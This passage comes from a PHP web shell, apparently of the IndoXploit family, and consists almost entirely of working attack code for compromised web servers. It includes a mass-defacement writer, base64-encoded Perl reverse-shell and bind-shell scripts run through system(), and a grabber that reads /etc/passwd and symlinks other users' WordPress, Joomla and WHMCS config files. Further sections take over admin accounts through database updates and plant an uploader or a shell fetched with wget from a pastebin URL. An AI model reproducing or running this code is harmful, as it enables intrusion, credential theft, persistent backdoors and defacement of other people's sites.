2632 if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
2633 if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
2634 if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
2635 if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
2636 snow[i].posy=0
2637 }
2638 }
2639 var timer=setTimeout("movesnow()",50)
2640}
2641
2642for (i=0;i<=snowmax;i++) {
2643 document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
2644}
2645if (browserok) {
2646 window.onload=initsnow
2647}
2648</script>
2649<td align=center>
2650</head>
2651<body bgcolor="#000000" text="#FFFF00"><center>
2652<font face=courier new>
2653<h1>
2654<font color='red'>hacked by Kapaljetz666</font><p>
2655<font size=3>don't worry, and keep your calm<br>
2656Deface just a game, if you say it's a crime, that mean you're stupid<p>
2657</font>
2658<font face='courier new' size=3>
2659greets for you <a href="http://zone-h.org/archive/notifier=Kapaljetz666" target="_blank">
2660<img src="http://s10.postimg.org/6cc1ngy7p/Cur.png" name="haha you found me" height=20 width=25></img></a>
2661</font>
2662<EMBED ALIGN='CENTER' AUTOSTART='TRUE' HEIGHT='1' LOOP='TRUE' SRC='http://vivat365.com/wp-admin/videoplayback_2.swf' WIDTH='1'></EMBED>
2663</style>
2664</body>
2665</html>
2666</textarea><br>
2667<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table><br></form>
2668<h3>defaced result: </h3>
2669<br><br>
2670versi text area:<br>
2671<textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>
2672<?php $ini="http://";
2673 $mainpath=$_POST[path];
2674 $file=$_POST[file];
2675 $dir=opendir("$mainpath");
2676 $code=base64_encode($_POST[index]);
2677 $indx=base64_decode($code);
2678 while($row=readdir($dir)){
2679 $start=@fopen("$row/$file","w+");
2680 $finish=@fwrite($start,$indx);
2681 if ($finish){echo"$ini$row/$file\n";}}
2682?>
2683</textarea><br>
2684<br><br>versi text:<br><br>
2685<?php $ini="http://";
2686 $mainpath=$_POST[path];
2687 $file=$_POST[file];
2688 $dir=opendir("$mainpath");
2689 $code=base64_encode($_POST[index]);
2690 $indx=base64_decode($code);
2691 while($row=readdir($dir)){
2692 $start=@fopen("$row/$file","w+");
2693 $finish=@fwrite($start,$indx);
2694 if ($finish){echo"<a href="."$ini$row/$file"." target="."_blank".">$ini$row/$file</a><br>";}}
2695
2696?>
2697<?php
2698}
2699elseif(isset($_GET['x']) && ($_GET['x'] == 'sbc')){ @ini_set('output_buffering',0);
2700?>
2701 <form action="?y=<?php echo $pwd; ?>&x=sbc" method="post">
2702 <br><br><center><b><font size=4>Back Connect Simple</font></b></center><br>
2703<?php
2704echo "
2705<head>
2706<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
2707<form method='POST'>
2708<title>Facebook Brute Force 2014</title>
2709</head>
2710<style>
2711textarea {
2712resize:none;
2713color: #000000 ;
2714border:1px solid red ;
2715border-left: 4px solid red ;
2716}
2717input {
2718color: #000000;
2719border:1px dotted black;
2720}
2721</style>";
2722if ($_REQUEST['cdirname']){
2723if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
2724function bcn($ipbc,$pbc){
2725$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
2726NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
2727MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
2728dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
2729IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
2730YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
2731LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
2732KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
2733KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
2734IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
2735ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
2736$opbc=fopen("bcc.pl","w");
2737fwrite($opbc,base64_decode($bcperl));
2738fclose($opbc);
2739system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2740}
2741function wbp($wb){
2742$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
2743cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
2744a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
2745ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
2746IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
2747IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
2748VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
2749VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
2750$opwb=fopen("wbp.pl","w");
2751fwrite($opwb,base64_decode($wbp));
2752fclose($opwb);
2753echo getcwd();
2754system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2755}
2756function lbp($wb){
2757$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
2758YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
2759U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
2760VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
2761QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
2762dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
2763b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
2764Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
2765$oplb=fopen("lbp.pl","w");
2766fwrite($oplb,base64_decode($lbp));
2767fclose($oplb);
2768system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2769}
2770
2771if($_REQUEST['portbw']){
2772wbp($_REQUEST['portbw']);
2773
2774}if($_REQUEST['portbl']){
2775lbp($_REQUEST['portbl']);
2776}
2777if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
2778bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
2779
2780}
2781echo "<p align='center'><font face='Tahoma' color='#007700' size='2pt' /><p align='center'><br>Ip : <input type=text name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input type=text name=portbc value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'><p align='center'><br><font face='Tahoma' color='#009900' size='2pt'> Windows Bind Port</font> <br>Port : <input type=text name=portbw value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'> <br><font face='Tahoma' color='#009900' size='2pt'>Linux Bind Port</font> <br>Port : <input type=text name=portbl value=5555> <input type=submit value=Connect></form><br><br>".$end;exit;
2782}
2783////////////////////////////////////////////////////////////////////////////
2784elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2785?>
2786 <form action="?y=<?php echo $pwd; ?>&x=grabc" method="post">
2787 <br><br><center><b><font size=4>Config Grabber !</font></b></center><br>
2788<?php
2789echo "
2790<form method='POST'>
2791</head>
2792<style>
2793textarea {
2794resize:none;
2795color: #000000 ;
2796background-color:#000000;
2797font-size:8pt; color:#FFFF00;
2798border:1px solid white ;
2799border-left: 4px solid white ;
2800width:543px;
2801height:400px;
2802}
2803input {
2804color: #000000;
2805border:1px dotted white;
2806}
2807</style>";
2808echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('jembutgrab', 0755);@chdir('jembutgrab');
2809$htaccess="
2810OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2811Options Indexes FollowSymLinks
2812ForceType text/plain
2813AddType text/plain .php
2814AddType text/plain .html
2815AddType text/html .shtml
2816AddType txt .php
2817AddHandler server-parsed .php
2818AddHandler txt .php
2819AddHandler txt .html
2820AddHandler txt .shtml
2821Options All
2822Options All";
2823file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2824$passwd=explode("\n",$passwd);
2825echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2826foreach($passwd as $pwd){
2827$pawd=explode(":",$pwd);$user =$pawd[0];
2828@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2829@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2830@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2831@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2832@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2833@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2834@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2835@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2836@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2837@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2838@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2839@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2840@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2841@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2842@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2843@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2844@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2845@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2846@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2847@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2848@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2849@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2850@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2851@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2852@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2853@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2854@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2855@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2856@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2857@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2858@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2859@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2860@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2861@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2862@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2863@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2864@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2865@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2866@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2867@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2868echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="jembutgrab">Open configs</a></font></b>';}
2869}
2870elseif(isset($_GET['x']) && ($_GET['x'] == 'grabwpjm'))
2871 {
2872 ?>
2873 <form action="?path=<?php echo $path; ?>&x=grabwpjm" method="post">
2874<?php
2875// Tu5b0l3d
2876// thx to: IndoXPloit, HNc
2877// Config Wordpress and Joomla Grabber
2878error_reporting(0);
2879 echo "<h1><center>Created By IndoXploit<br><a href='configs/'style='text-decoration:none;'>Open Configs</a></center><br></h1>";
2880//$us = file_get_contents("/etc/passwd");
2881$usa = fopen('/etc/passwd','r');
2882$dir = mkdir('configs', 0777);
2883$rrrr = "Options all \n DirectoryIndex configs.html \n Require None \n Satisfy Any";
2884$frr = fopen('configs/.htaccess', 'w');
2885
2886fwrite($frr, $rrrr);
2887while($us = fgets($usa)){
2888if($us==""){
2889 echo "cann't read /etc/passwd";
2890}
2891else{
2892preg_match_all('/(.*?):x:/', $us, $user_byk);
2893
2894 foreach($user_byk[1] as $user){
2895 $dir1 = "/home/$user/public_html/";
2896 if(is_readable($dir1)){
2897 $dir = "/home/$user/public_html/wp-config.php";
2898 $dir2 = "/home/$user/public_html/configuration.php";
2899 $ambil = file_get_contents($dir);
2900
2901
2902 if($ambil==""){
2903 $ambil_joom = file_get_contents($dir2);
2904 if($ambil_joom==""){
2905 echo "<font color='green'>$user <= Readable (Bukan Wordpress dan Joomla)<br></font>";
2906
2907 }
2908 else{
2909
2910 $file1 = "grabwpjm/$user-configuration.txt";
2911 $fp2 = fopen($file1,"w");
2912 fputs($fp2,$ambil);
2913
2914 echo "<a href='grabwpjm/$user-configuration.txt'style='text-decoration:none;'>$user </a> <= Joomla<br>";
2915
2916 }
2917
2918 }
2919 else{
2920
2921 $file1 = "grabwpjm/$user-wpconfig.txt";
2922 $fp2 = fopen($file1,"w");
2923 fputs($fp2,$ambil);
2924
2925 echo "<a href='grapwpjm/$user-wpconfig.txt'style='text-decoration:none;'>$user </a> <= Wordpress<br>";
2926
2927 }
2928
2929
2930 }
2931 else{
2932
2933
2934 }
2935
2936 }
2937
2938}
2939
2940}
2941
2942}
2943elseif(isset($_GET['x']) && ($_GET['x'] == 'joom'))
2944 {
2945 ?>
2946 <form action="?path=<?php echo $path; ?>&x=joom" method="post">
2947<?php
2948error_reporting(0);
2949//Tu5b0l3d
2950
2951//thx to: IndoXploit, Hacker-Newbie.org
2952
2953
2954
2955 if($_POST['submitt']){
2956
2957
2958 $host = $_POST['host'];
2959
2960 $username = $_POST['username'];
2961
2962 $password = $_POST['password'];
2963
2964 $db = $_POST['db'];
2965
2966 $dbprefix = $_POST['dbprefix'];
2967
2968 $user_baru = $_POST['user_baru'];
2969
2970 $password_baru = $_POST['password_baru'];
2971
2972 $tanya = $_POST['tanya'];
2973
2974
2975 $prefix = $dbprefix."users";
2976
2977 $pass = md5("$password_baru");
2978
2979 $upda = $db.".".$dbprefix;
2980
2981
2982 mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
2983
2984 mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
2985
2986 $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2987 $r=mysql_fetch_array($tampil);
2988 $id = $r[id];
2989
2990
2991 mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
2992
2993
2994 function token($target){
2995 $ch2 = curl_init ("$target");
2996 curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
2997 curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
2998 curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2999 curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
3000 curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
3001 curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
3002 curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
3003 curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
3004 $data = curl_exec ($ch2);
3005
3006
3007 preg_match('/<input type="hidden" name="(.*?)" value="1"/', $data, $token);
3008 $token = $token[1];
3009 return $token;
3010 }
3011
3012 if ($tanya == "y"){
3013 $target = $_POST['target'];
3014 $path = "/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D";
3015 $site = $target.$path;
3016 $token1 = token($site);
3017
3018
3019
3020$post = array(
3021 "username" => "$user_baru",
3022 "passwd" => "$password_baru",
3023 "lang" => "en-GB",
3024 "option" => "com_login",
3025 "task" => "login",
3026 "return" => "aW5kZXgucGhw",
3027 "$token1" => "1",
3028 );
3029
3030$ch = curl_init ("$site");
3031curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3032curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3033curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3034curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
3035curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3036curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3037curl_setopt ($ch, CURLOPT_POST, 1);
3038@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3039curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3040curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3041$masuk = curl_exec ($ch);
3042
3043$token2 = token($site);
3044
3045$upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
3046
3047$post2 = array(
3048 "jform[source]" => "$upload",
3049 "task" => "template.save",
3050 "$token2" => "1",
3051 "jform[extension_id]"=> "503",
3052 "jform[filename]" => "/error.php",
3053 );
3054
3055$ch3 = curl_init ("$site");
3056curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
3057curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
3058curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3059curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
3060curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
3061curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
3062curl_setopt ($ch3, CURLOPT_POST, 1);
3063curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
3064curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
3065curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
3066$masuk2 = curl_exec ($ch3);
3067
3068if(preg_match("#successfully#is", $masuk2)){
3069echo "uploader udh ketanem...<br>";
3070echo "lanjut mepes...<br>";
3071
3072$file_pepes = "hacked.php";
3073$ch4 =curl_init("$target/templates/beez3/error.php");
3074 curl_setopt($ch4, CURLOPT_POST, true);
3075 curl_setopt($ch4, CURLOPT_POSTFIELDS,
3076 array('file'=>"@$file_pepes"));
3077 curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
3078 curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
3079 curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
3080 $postResult = curl_exec($ch4);
3081 curl_close($ch4);
3082
3083
3084 $ch5 =curl_init("$target/k.php");
3085 curl_setopt($ch5, CURLOPT_POST, true);
3086 curl_setopt($ch5, CURLOPT_RETURNTRANSFER, 1);
3087 curl_setopt ($ch5, CURLOPT_SSL_VERIFYPEER, 0);
3088 curl_setopt ($ch5, CURLOPT_SSL_VERIFYHOST, 0);
3089 $postResult2 = curl_exec($ch5);
3090
3091
3092 if(preg_match('#hacked#is', $postResult2)){
3093 echo "<font color='green'>berhasil mepes...</font><br>";
3094 echo "$target/k.php<br>";
3095 }
3096 else{
3097 echo "<font color='red'>gagal mepes...</font><br>";
3098 echo "coba aja manual: <br>";
3099 echo "$target/administrator<br>";
3100 echo "username: $user_baru<br>";
3101 echo "password: $password_baru<br>";
3102 }
3103
3104
3105
3106}
3107else{
3108 echo "failed<br>";
3109 echo "data udh bener. beda template mungkin :(<br>";
3110 echo "coba aja manual: <br>";
3111 echo "$target/administrator<br>";
3112 echo "username: $user_baru<br>";
3113 echo "password: $password_baru<br>";
3114}
3115
3116
3117curl_close($ch3);
3118curl_close($ch);
3119
3120
3121
3122
3123
3124 }
3125 elseif($tanya == "n"){
3126 echo "Sukses<br>";
3127 echo "username: $user_baru<br>";
3128 echo "password: $password_baru<br>";
3129
3130 }
3131
3132
3133 }
3134
3135
3136
3137 else{
3138
3139 echo '<html>
3140
3141 <head>
3142
3143 <title>Edit user in joomla</title>
3144
3145 </head>
3146
3147
3148
3149 <body>
3150
3151 <center>
3152
3153 <center
3154
3155 <h2>Edit user in joomla</h2>
3156
3157 <table>
3158
3159 <tr><td><form method="post" action="?action"></td></tr>
3160
3161 <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
3162
3163 <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
3164
3165 <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
3166
3167 <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
3168
3169 <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
3170
3171 <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
3172
3173 <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
3174 <tr><td></td></tr>
3175 <tr><td></td></tr>
3176
3177
3178 <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
3179 <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
3180
3181 <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
3182
3183 </table>
3184 *nb: Masukin script deface anda hacked.php. kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
3185
3186 </center>
3187
3188 </body>';
3189
3190 }
3191
3192
3193
3194}
3195elseif(isset($_GET['x']) && ($_GET['x'] == 'ggwp'))
3196 {
3197 ?>
3198 <form action="?path=<?php echo $path; ?>&x=ggwp" method="post">
3199<?php
3200 if($_POST){
3201 $host = $_POST['host'];
3202 $username = $_POST['username'];
3203 $password = $_POST['password'];
3204 $db = $_POST['db'];
3205 $dbprefix = $_POST['dbprefix'];
3206 $user_baru = $_POST['user_baru'];
3207 $password_baru = $_POST['password_baru'];
3208 $prefix = $db.".".$dbprefix."users";
3209 $sue = $db.".".$dbprefix."options";
3210 $tanya = $_POST['tanya'];
3211 $target = $_POST['target'];
3212 $nick = $_POST['nick'];
3213 $pass = md5("$password_baru");
3214
3215
3216 mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
3217 mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
3218
3219 $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3220 $r=mysql_fetch_array($tampil);
3221 $id = $r[ID];
3222
3223 $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
3224 $r2=mysql_fetch_array($tampil2);
3225 $target = $r2[option_value];
3226
3227
3228 mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
3229
3230
3231
3232
3233 if($tanya=="y"){
3234
3235 function ambilKata($param, $kata1, $kata2){
3236 if(strpos($param, $kata1) === FALSE) return FALSE;
3237 if(strpos($param, $kata2) === FALSE) return FALSE;
3238 $start = strpos($param, $kata1) + strlen($kata1);
3239 $end = strpos($param, $kata2, $start);
3240 $return = substr($param, $start, $end - $start);
3241 return $return;
3242}
3243
3244 function anucurl($sites){
3245 $ch1 = curl_init ("$sites");
3246curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
3247curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
3248curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3249curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
3250curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
3251curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
3252curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
3253curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
3254$data = curl_exec ($ch1);
3255return $data;
3256 }
3257
3258 function lohgin($cek, $web, $userr, $pass){
3259 $post = array(
3260 "log" => "$userr",
3261 "pwd" => "$pass",
3262 "rememberme" => "forever",
3263 "wp-submit" => "Log In",
3264 "redirect_to" => "$web/wp-admin/",
3265 "testcookie" => "1",
3266 );
3267$ch = curl_init ("$cek");
3268curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3269curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3270curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3271curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3272curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3273curl_setopt ($ch, CURLOPT_POST, 1);
3274curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3275curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3276curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3277$data6 = curl_exec ($ch);
3278return $data6;
3279 }
3280
3281$site= "$target/wp-login.php";
3282$site2= "$target/wp-admin/theme-install.php?upload";
3283$a = lohgin($site, $target, $user_baru, $password_baru);
3284$b = lohgin($site2, $target, $user_baru, $password_baru);
3285
3286
3287$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3288echo "# token -> $anu2<br>";
3289
3290
3291 system('wget http://pastebin.com/raw.php?i=mEQP6prW');
3292 system('cp raw.php?i=mEQP6prW m.php');
3293
3294 $post2 = array(
3295 "_wpnonce" => "$anu2",
3296 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3297 "themezip" => "@m.php",
3298 "install-theme-submit" => "Install Now",
3299 );
3300$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
3301curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3302curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3303curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3304curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
